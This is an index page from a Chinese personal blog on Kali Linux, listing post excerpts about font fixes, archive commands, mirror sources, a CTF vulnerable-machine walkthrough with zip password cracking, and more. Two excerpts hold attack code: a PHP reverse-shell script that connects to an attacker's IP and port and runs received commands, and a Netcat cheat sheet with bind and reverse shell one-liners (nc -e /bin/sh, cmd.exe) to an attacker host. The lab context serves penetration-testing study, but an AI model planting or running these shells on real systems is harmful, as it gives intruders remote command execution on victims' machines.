Myluzh Blog

解决Kali中文乱码显示方块的问题

2020-3-15 myluzh NOTE

装完Kali虚拟机,无法正常显示中文,都是方块乱码。 解决方法: 1.更新Kali源 2.终端下执行 sudo apt-get install ttf-wqy-zenhei 3.重启 reboot

阅读全文>>

标签: kali linux 乱码

评论(0) (1035)

Kali Liunx下解压缩zip,tar,tar.gz,tar.bz2文件

2020-3-10 myluzh NOTE

tar(注:tar是打包,不是压缩!) 解包:tar xvf FileName.tar 打包:tar cvf FileName.tar DirName .gz 解压1:gunzip FileName.gz 解压2:gzip -d FileName.gz 压缩:gzip FileName .tar.gz 解压:tar zxvf FileName.tar.gz 压缩:tar zcvf FileName.tar.gz DirName .bz2 解压1:bzip2 -d FileName.bz2 解压2:bunzip2 FileName.bz2 压缩: bzip2 -z FileName .tar.bz2 解压:tar jxvf FileName.tar.bz2 压缩:tar jcvf FileName.tar.bz2 DirName .bz 解压1:bzip2 -d FileName.bz 解压2:bunzip2 FileName.bz .tar.bz 解压:tar jxvf FileName.tar.bz .Z 解压:uncompress FileName.Z 压缩...

阅读全文>>

标签: kali linux 解压 压缩 zip tar tar.gz tar.bz2

评论(0) (765)

Os-ByteSec靶机渗透测试笔记

2020-3-10 myluzh SECURE

0x01 初步探测 靶机导入虚拟机后,先找到靶机IP,使用netdiscover命令扫描即可。扫到靶机ip192.168.56.101 nmap扫了下靶机开放的端口 0x02 访问网站 那就先从80端口开始下手,访问站点看看有什么内容,主页如下 随后就是dirb扫了下目录,没有什么能利用的东西,然后看了下主页源代码,看到源代码,里面有个提示 #GET#smb#free ,应该是提示我们利用smb。 0x03 步入smb 这边没有思路了,查了下writeup,smbclient语法如下;用户名为smb,密码为空,成功进入 smbclient//ip/myshare -U xxxx 查看了下当前目录文件,main.txt跟safe.zip get命令下载文件 0x04 压缩包爆破 查看main.txt没东西能利用,解压safe.zip发现需要密码,利用fcrackzip进行爆破 fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safezip 密码为hacker1,解压后得到文件secret.jpg,user...

阅读全文>>

评论(0) (1370)

PHP反弹shell

2020-3-6 myluzh PHP

需要传递ip跟port两个参数,ip为攻击机的ip,port为自定义端口 <?php set_time_limit(0); $ip=$_GET['ip'] $port=$_GET['port']; if ($ip == "" and $port == "") { echo "[ip] [port] not defined"; exit(); } $fp = @fsockopen($ip, $port, $errno, $errstr); if (!$fp) { echo "connection timed out"; } else { fputs($fp, "\n++++++++++connect success++++++++\n"); while (!feof($fp)) { fputs($fp, "shell:"); //输出 $shell = fgets($fp); $message = `$shell`; fputs($fp, $message); } ...

阅读全文>>

标签: php 反弹 shell

评论(0) (1040)

Netcat基本用法总结

2020-3-6 myluzh NOTE

0x01基础使用 靶机创建一个服务端: nc -nvlp [端口] 攻击机开启监听: nc [服务端IP] [端口] 0x02获取shell 正向shell 靶机创建一个服务端: #Windows nc -nvlp [端口] -e cmd.exe #Linux nc -nvlp [端口] -e /bin/sh 攻击机开启监听: nc [服务端IP] [端口] 反向shell 靶机创建一个服务端: #Windows nc [攻击机IP] [端口] -e cmd.exe #Linux nc [攻击机IP] [端口] -e /bin/sh 攻击机开启监听: nc -nvlp [端口] 有些时候靶机上并没有nc,所以需要php反弹shell来实现,关于php反弹shell脚本 0x03文件传输 靶机创建一个服务端: nc -nvlp [端口] >1.txt 攻击机接受文件: nc [服务端IP] [端口] <1.txt 参考资料: Netcat下载地址:https://eternallybored.org/misc/netcat/ “瑞士军刀”N...

阅读全文>>

评论(0) (1051)

Kali Liunx更新源-国内Kali源

2020-3-6 myluzh NOTE

0x01编辑kali的更新源地址文件 sudo vim /etc/apt/sources.list 0x02添加下面的源地址(选择几个增加即可) #中科大 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib #阿里云 deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib #清华大学 deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-r...

阅读全文>>

标签: kali linux 更新源

评论(0) (872)